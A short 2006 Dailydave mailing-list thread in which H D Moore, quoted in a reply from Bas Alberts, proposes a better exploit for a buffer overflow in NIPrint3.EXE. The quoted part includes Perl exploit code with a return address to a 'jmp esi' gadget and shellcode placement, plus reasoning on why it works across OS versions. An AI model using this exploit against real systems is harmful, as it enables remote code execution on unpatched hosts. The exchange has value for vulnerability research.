Dailydave: Re: VisualSploit redux

[Bas Alberts <bas.alberts () immunitysec com>]

Thank god the VS demo buffer is also compatible with jmp esi targets..we
must've gotten that right by accident! :D:D

Thanks HD :D

Love,
Bas

On Tue, May 23, 2006 at 05:35:38PM -0500, H D Moore wrote:
> On Tuesday 23 May 2006 06:18, Dave Aitel wrote:
> > Anyways, there's a movie here:
> > http://www.immunitysec.com/documentation/vs_niprint.html
> Not to nitpick, but there is a better way to exploit this bug:
>
> 'Targets' => [ ['NIPrint3.EXE (TDS:0x3a045ff2)', 0x00404236] ],
>
> my $req = Pex::Text::AlphaNumText(8192);
> substr($req, 0, 2, "\xeb\x33");
> substr($req, 49, 4, pack('V', $target->[1]));
> substr($req, 53, length($shellcode), $shellcode);
> $s->Send($req);
>
> This will return to a "jmp %esi", where %esi points to the source string 
> before the memory overwrite. The benefits of this vs the "jmp %esp":
> * Our code isn't running so close to ESP (easy to fix w/prepend)
> * More room for the actual payload (could even embed the ret)
> * The return address will work regardless of OS/SP combo
>
> Fun stuff, keep up the demos :-)
>
> -HD

Attachment: _bin
Description: